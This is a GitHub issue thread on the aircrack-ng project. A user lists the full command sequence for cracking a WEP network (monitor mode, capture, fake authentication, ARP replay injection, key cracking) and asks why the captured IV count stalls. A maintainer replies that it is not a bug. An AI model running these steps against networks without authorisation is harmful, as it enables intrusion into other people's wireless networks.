### ISSUE TITLE
DATA STOPS INCREASING WHILE CRACKING A WEP NETWORK THEREFORE THE ATTACK FIELD

### ISSUE THREAD

**Issue by WeavKing** [aircrack-ng/aircrack-ng#2354]
Hello Guys, I hope you are doing well !
I'm attempting to break into a WEP network, but once the data reaches around 21000, it stops growing therefore the attack simply field because aircrack-ng will need a lot of packets with IVs in order to crack the network key
let me show you the commands that I've ran and I hope you guys help me out with this I really appreciate it !
------------Getting My Interface Card Ready------------
1 - ifconfig wlan0 down
2 - airmon-ng check kill
3 - iwconfig wlan0 mode Monitor
4 - ifconfig wlan0 up
-----------Capture Data-------------
1 - airodump-ng --band abg wlan0
2 - airodump-ng --bssid 40:3F:8C:DF:20:1A --channel 1 --write Documents/arpreplay wlan0
<< I also ran fake authentication attack to force the AP to Generate new ARP reply packets with IVs aka initialization vector  because the Data isn't increasing ! >>
<< to do this I need to associate with the Router / AP >>
3 -  aireplay-ng --fakeauth 0 -a [ my_router's_mac_address ] -e [ my_network_name ] wlan0
<< The Authentication is OPN now >>
OUTPUT >> 23:55:03  Association successful :-) (AID: 1)
<< we successfully associated with the Router / AP Good Now I just need to Read & inject packets into the network traffic ! >>
4 - aireplay-ng --arpreplay -b [ my_router's_mac_address ] -h [ my_interface_card_mac_address ] wlan0
FINAL OUTPUT >> Read 29573 packets (got 5877 ARP requests and 6108 ACKs), sent 7118 packets...(499 pps)
<< although the Data start Increasing but it eventually stops once it's reaches 21845 >>
<< I will post the screenshot here >> https://postimg.cc/XrbSS5Xt >>
<< as you notice in the picture the data was 21845 this is wasn't enough for aircrack-ng ! >>
5 - aircrack-ng Documents/arpreplay-01.cap
<< check it out https://postimg.cc/56BwS4t5 >>
---------------------------------------------------------
ANY HELP WOULD BE APPRECIATED !
---------------------------------------------------------

**Comment by Mister-X-** [comment]
A few things:
- Follow the bug report guidelines!
- This is not a bug, please take it to [Discussions](https://github.com/aircrack-ng/aircrack-ng/discussions) as mentioned prior to filing this.
- Don't write in all caps.
- Use Markdown to make it readable.
